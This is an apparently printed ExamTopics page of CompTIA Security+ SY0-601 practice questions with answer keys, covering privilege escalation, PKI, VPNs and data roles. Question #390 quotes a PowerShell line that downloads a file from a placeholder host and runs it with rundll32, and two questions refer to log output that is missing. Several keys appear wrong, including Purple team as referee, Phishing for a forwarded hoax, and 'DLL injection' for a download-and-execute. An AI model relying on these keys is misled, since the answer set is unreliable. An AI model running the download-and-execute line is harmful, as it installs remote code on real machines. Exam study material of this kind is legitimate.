Currently there are no comments in this discussion, be the first to comment!

Question #389 Topic 1

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following
string in the current user's list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

A. Privilege escalation

B. Memory leak

C. Directory traversal

D. Race condition

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 531/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #390 Topic 1

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does
and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile


$env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.

B. A PowerShell code is displaying a picture.

C. A PowerShell code is configuring environmental variables.

D. A PowerShell code is changing Windows Update settings.

Correct Answer: A

Question #391 Topic 1

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server:

Which of the following BEST describes this kind of attack?

A. Directory traversal

B. SQL injection

C. API

D. Request forgery

Correct Answer: A

Question #392 Topic 1

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect
data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer

B. Data owner

C. Backup administrator

D. Data custodian

E. Internal auditor

Correct Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 532/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #393 Topic 1

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

A. White team

B. Purple team

C. Green team

D. Blue team

E. Red team

Correct Answer: B

Currently there are no comments in this discussion, be the first to comment!

Question #394 Topic 1

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

A. Vulnerabilities with a CVSS score greater than 6.9.

B. Critical infrastructure vulnerabilities on non-IP protocols.

C. CVEs related to non-Microsoft systems such as printers and switches.

D. Missing patches for third-party software on Windows workstations and servers.

Correct Answer: D

Question #395 Topic 1

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions
should the administrator choose?

A. MAC filtering

B. Anti-malware

C. Translation gateway

D. VPN

Correct Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 533/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #396 Topic 1

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had
been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

A. The DNS logs

B. The web server logs

C. The SIP traffic logs

D. The SNMP logs

Correct Answer: B

Question #397 Topic 1

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the
key?

A. .pfx

B. .csr

C. .pvk

D. .cer

Correct Answer: D

Question #398 Topic 1

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following
should the administrator consider?

A. Hashing

B. Salting

C. Lightweight cryptography

D. Steganography

Correct Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 534/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #399 Topic 1

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

• www.company.com (main website)


• contactus.company.com (for locating a nearby location)
• quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same
naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

A. SAN

B. Wildcard

C. Extended validation

D. Self-signed

Correct Answer: B

Question #400 Topic 1

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst
monitor?

A. SFTP

B. AIS

C. Tor

D. IoC

Correct Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 535/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #401 Topic 1

A security analyst is reviewing logs on a server and observes the following output:

Which of the following is the security analyst observing?

A. A rainbow table attack

B. A password-spraying attack

C. A dictionary attack

D. A keylogger attack

Correct Answer: C

Question #402 Topic 1

A company is launching a website in a different country in order to capture user information that a marketing business can use. The company
itself will not be using the information. Which of the following roles is the company assuming?

A. Data owner

B. Data processor

C. Data steward

D. Data collector

Correct Answer: D

Question #403 Topic 1

An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics.
Which of the following should the organization consult for the exact requirements for the cloud provider?

A. SLA

B. BPA

C. NDA

D. MOU

Correct Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 536/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #404 Topic 1

Which of the following secure application development concepts aims to block verbose error messages from being shown in a user’s interface?

A. OWASP

B. Obfuscation/camouflage

C. Test environment

D. Prevention of information exposure

Correct Answer: D

Question #405 Topic 1

If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?

A. Perfect forward secrecy

B. Elliptic-curve cryptography

C. Key stretching

D. Homomorphic encryption

Correct Answer: A

Question #406 Topic 1

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50
employees working on any given day. Which of the following VPN solutions would BEST support the new office?

A. Always-on

B. Remote access

C. Site-to-site

D. Full tunnel

Correct Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 537/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #407 Topic 1

Which of the following scenarios BEST describes a risk reduction technique?

A. A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned
about losses from data breaches.

B. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure
method of operation.

C. A security control objective cannot be met through a technical change, so the company performs regular audits to determine if violations
have occurred.

D. A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

Correct Answer: B

Question #408 Topic 1

Which of the following social engineering attacks BEST describes an email that is primarily intended to mislead recipients into forwarding the
email to others?

A. Hoaxing

B. Pharming

C. Watering-hole

D. Phishing

Correct Answer: D

Currently there are no comments in this discussion, be the first to comment!

Question #409 Topic 1

Which of the following will provide the BEST physical security countermeasures to stop intruders? (Choose two.)

A. Alarms

B. Signage

C. Lighting

D. Access control vestibules

E. Fencing

F. Sensors

Correct Answer: DE

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 538/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #410 Topic 1

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the
following should be the first lines of defense against such an attack? (Choose two.)

A. MAC filtering

B. Zero trust segmentation

C. Network access control

D. Access control vestibules

E. Guards

F. Bollards

Correct Answer: AC

Currently there are no comments in this discussion, be the first to comment!

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 539/539

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy